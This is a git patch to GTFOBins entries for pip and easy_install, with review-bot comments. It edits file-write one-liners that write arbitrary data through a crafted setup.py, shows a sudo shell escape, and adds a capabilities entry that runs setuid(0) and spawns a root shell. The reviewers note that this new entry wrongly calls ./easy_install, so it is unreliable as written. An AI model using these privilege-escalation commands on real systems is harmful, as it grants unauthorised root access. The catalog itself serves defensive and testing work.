From a156e10996562132453f60ec79b857bb97225f57 Mon Sep 17 00:00:00 2001
From: Emilio Pinna
Date: Sat, 29 Sep 2018 10:51:00 +0100
Subject: [PATCH] Use LFILE in easy_install and pip file-write function
---
 _gtfobins/easy_install.md | 3 ++-
 _gtfobins/pip.md | 8 +++++++-
 2 files changed, 9 insertions(+), 2 deletions(-)
diff --git a/_gtfobins/easy_install.md b/_gtfobins/easy_install.md
index fedc4c5..db43b38 100644
--- a/_gtfobins/easy_install.md
+++ b/_gtfobins/easy_install.md
@@ -51,9 +51,10 @@ functions:
 file-write:
 - description: The file path must be absolute.
 code: |
+ export LFILE=/tmp/file_to_save
 TF=$(mktemp -d)
 echo "import os;
- os.execl('$(whereis python)', 'python', '-c', 'open(\"/tmp/file_to_write\",\"w+\").write(\"DATA\")')" > $TF/setup.py
+ os.execl('$(whereis python)', 'python', '-c', 'open(\"$LFILE\",\"w+\").write(\"DATA\")')" > $TF/setup.py
 easy_install $TF
 file-read:
 - description: The read file content is wrapped within program messages.
diff --git a/_gtfobins/pip.md b/_gtfobins/pip.md
index 60beb18..839dd95 100644
--- a/_gtfobins/pip.md
+++ b/_gtfobins/pip.md
@@ -50,8 +50,9 @@ functions:
 file-write:
 - description: It needs an absolute local file path.
 code: |
+ export LFILE=/tmp/file_to_save
 TF=$(mktemp -d)
- echo 'open("/tmp/file_to_write","w+").write("DATA")' > $TF/setup.py
+ echo "open('$LFILE','w+').write('DATA')" > $TF/setup.py
 pip install $TF
 file-read:
 - description: The read file content is corrupted as wrapped within an exception error.
@@ -69,4 +70,9 @@ functions:
 TF=$(mktemp -d)
 echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
 sudo pip install $TF
+ capabilities-enabled:
+ - code: |
+ TF=$(mktemp -d)
+ echo "import os; os.setuid(0); os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
+ ./easy_install
 ---
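Review bot: The `file-write` entry in easy_install.md now lets the shell splice `$LFILE` unescaped into a Python string literal (`open(\"$LFILE\",...)`), and the pip.md `file-write` hunk does the same with `open('$LFILE','w+')`, so a path containing a quote or backslash yields a `setup.py` that fails to parse or names a different file. In pip.md the `echo` also went from single to double shell quotes, so `$` and backticks in whatever replaces `DATA` are now expanded by the shell before Python sees them. I would state the constraint in both entries, e.g. `- description: The file path must be absolute and must not contain quotes or backslashes.`, and quote the redirect target as `> "$TF/setup.py"`. `export` is not required in either entry as written, because `$LFILE` is expanded by the calling shell inside the `echo`; a plain assignment would do.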
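Review bot: The new `capabilities-enabled` entry in pip.md ends with `./easy_install`, which is a different binary from the one this file documents and never consumes the `$TF/setup.py` written on the line before, so the entry as committed does not describe pip at all. It looks copied from easy_install.md (inferred; that file's own entry is not part of this diff), and the last line should mirror the invocation form of the `sudo pip install $TF` context line directly above it. Anyone deriving detections or hardening checks from this entry would key on the wrong program name. The addition is also outside what the subject line announces and would be easier to review and revert as its own commit.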